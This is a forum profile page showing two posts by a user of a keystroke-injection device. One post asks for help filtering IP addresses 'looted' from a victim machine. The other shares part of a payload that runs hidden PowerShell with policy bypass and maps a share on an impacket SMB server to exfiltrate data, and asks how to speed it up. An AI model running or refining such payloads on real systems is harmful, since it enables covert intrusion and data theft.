Jump to content

Koeptis

Members
  • Posts

    2
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Koeptis's Achievements

Newbie

Newbie (1/14)

  1. Hi guys, I have trouble getting sed and grep on a text file looted using a modified samba exfiltrator. I use firmware 1.6 and the command used to gather the IP addresses is "(Get-NetIPAddress -AddressFamily ipv4).IPAddress" (will later try to gather LAN IP addresses). I tried the commands on Kali without an issue, but on the bash bunny it does not work as expected. root@bunny:~# cat /loot/smb/e/DESKTOP-63THJCH/hacked.txt ▒▒172.16.64.10 192.168.56.1 169.254.42.194 169.254.8.188 169.254.247.206 169.254.150.40 192.168.1.48 127.0.0.1 root@bunny:~# cat /loot/smb/e/DESKTOP-63THJCH/hacked.txt | grep "169" root@bunny:~# sed -i '/^169\.[0-9]/d' /loot/smb/e/DESKTOP-63THJCH/hacked.txt root@bunny:~# sed '/^169\.[0-9]/d' /loot/smb/e/DESKTOP-63THJCH/hacked.txt ▒▒172.16.64.10 192.168.56.1 169.254.42.194 169.254.8.188 169.254.247.206 169.254.150.40 192.168.1.48 127.0.0.1 root@bunny:~# I am using the commands wrong ?
  2. Hi Guys, I am new here and trying to get a better SMB2 exfiltration. However I run into slowness (about 30s-1min) when Powershell tries to connect to the impacket smbserver. (I tried to work this around for a while). Could there be a reliable and faster way to do this than with my code snippet there ? ATTACKMODE HID RNDIS_ETHERNET ... ... RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"while(!(Test-Path \\\\$HOST_IP\\s)){net use \\\\$HOST_IP\\s /user:$USERNAME $PASSWORD}; ... ... /tools/impacket/examples/smbserver.py -smb2support -comment '' s /loot/smb >> /loot/smbserver.log & ... Thank you.
×
×
  • Create New...